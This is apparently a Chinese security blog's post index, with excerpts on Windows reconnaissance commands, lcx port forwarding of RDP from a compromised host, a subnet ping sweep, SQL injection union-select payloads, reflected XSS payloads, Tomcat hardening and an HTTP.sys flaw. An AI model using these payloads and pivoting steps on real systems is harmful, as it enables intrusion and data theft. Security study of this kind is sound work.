摘要: Windows本地信息收集: hostname或者echo %COMPUTERNAME% 获取主机名 systeminfo 获取系统信息 set 环境变量 ipconfig /all 主机IP地址DNS服务器 route print 路由表 tasklist /v 查看进程 net session 阅读全文
posted @ 2018-01-10 10:47 seeker01 阅读(203) 评论(0) 推荐(0) 编辑
摘要: 0x01 什么是SSI和SSI注入 SSI是英文Server Side Includes的缩写,翻译成中文就是服务器端包含的意思。从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针。SSI具有强大的功能,只要使用一条简单的SSI 命令就可以实现整个网站的内容更新,时间和日期的 阅读全文
posted @ 2017-12-14 17:22 seeker01 阅读(802) 评论(0) 推荐(0) 编辑
摘要: 端口转发 一、lcx 的使用 1. 肉鸡上执行:lcx.exe –slave 公网 ip + 端口 肉鸡 ip + 端口 例如:lcx.exe -slave xxx.xxx.xxx.xxx 10001 127.0.0.1 3389 意思是把肉鸡的 3389 端口转发到 xxx.xxx.xxx.xxx 阅读全文
posted @ 2017-12-11 12:24 seeker01 阅读(318) 评论(0) 推荐(0) 编辑
摘要: 内网无工具扫描 一条 cmd 命令解决: for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl" ping 整个 c 段,只输出有响应的主机。 % H" g% Q+ _6 q- P7 t 更变态的: 4 o4 g8 阅读全文
posted @ 2017-12-08 09:44 seeker01 阅读(299) 评论(0) 推荐(0) 编辑
摘要: whois查询: http://tool.chinaz.com/ https://whois.aizhan.com/ https://x.threatbook.cn/ http://site.ip138.com/ 子域信息收集: https://phpinfo.me/domain/ 端口扫描: nm 阅读全文
posted @ 2017-12-08 09:21 seeker01 阅读(410) 评论(0) 推荐(0) 编辑
摘要: 1.基于字符型报错注入 报字段数: ' order by 3 --+ // “+” 代表空格 ' union select 1,2,3 --+ ' UNION SELECT 1,GROUP_CONCAT(SCHEMA_NAME),3 FROM INFORMATION_SCHEMA.SCHEMATA 阅读全文
posted @ 2017-12-05 19:10 seeker01 阅读(214) 评论(0) 推荐(0) 编辑
摘要: 反射型XSS漏洞挖掘思路: 1、客户端提交的内容,服务器未进行处理,原封不动的返回客户端。 2、挖掘XSS漏洞必须找到服务器的输出位置。 反射型XSS Poc: alert()函数过滤: <script>alert('xss')</script> 弹窗函数 <script>confirm('xss' 阅读全文
posted @ 2017-11-29 16:20 seeker01 阅读(823) 评论(1) 推荐(0) 编辑
摘要: 一、tomcat示例文件未删除 打开tomcat_home/webapps文件夹,默认存在docs和examples文件夹,建议删除docs和examples文件夹 二、tomcat管理后台(默认不允许登录) (1)如果不需要使用tomcat manager Tomcat 5.x: 默认通过http 阅读全文
posted @ 2017-09-27 21:50 seeker01 阅读(436) 评论(0) 推荐(0) 编辑
摘要: 解决python2中文乱码问题,python3不存在此问题 1、#coding=utf-8 2、#-*- coding:utf-8 -*- 查看python3中关键字 import keyword keyword.kwlist 阅读全文
posted @ 2017-09-23 14:12 seeker01 阅读(136) 评论(0) 推荐(0) 编辑
摘要: 0x01漏洞描述 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 阅读全文
posted @ 2017-08-06 14:21 seeker01 阅读(1427) 评论(0) 推荐(0) 编辑